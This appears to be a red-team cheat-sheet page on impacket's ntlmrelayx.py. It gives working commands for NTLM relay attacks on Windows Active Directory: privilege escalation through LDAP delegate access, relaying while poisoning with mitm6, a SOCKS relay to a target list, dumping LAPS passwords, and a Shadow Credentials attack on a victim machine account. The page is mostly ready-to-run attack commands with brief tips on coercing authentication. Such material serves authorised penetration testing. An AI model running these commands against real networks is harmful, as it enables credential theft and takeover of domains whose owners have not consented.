Skip to main content

ntlmrelayx.py

ntlmrelay is part of impacket.

Escalate privileges via relay

If you've already added a computer record to the environment (using something like powermad), you may be able relay to LDAP and assign escalated privileges to that computer object! For example:

ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$

Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc!

Delegate access attack while poisoning with mitm6

ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access

Setup SOCKS relay to a list of hosts

In this example we have a targets.txt file full of entries like this:

smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6

We setup the SOCKS relay like so:

ntlmrelayx.py -tf targets.txt -smb2support -socks

Dumping LAPS passwords

If you want to just setup a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify you want to dump LAPS passwords:

ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps

Shadow Credentials attack

My favorite write-up on this attack is probably this one from GuidePoint security

Find hosts with WebClient running

The webclientservicescanner works well for this.

Add a rogue DNS record pointing to your machine

Try dnstool.py for this.

Setup relay for the Shadow Credentials attack

ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da

Trigger HTTP auth from VICTIMS

Head to our coercer page for more info.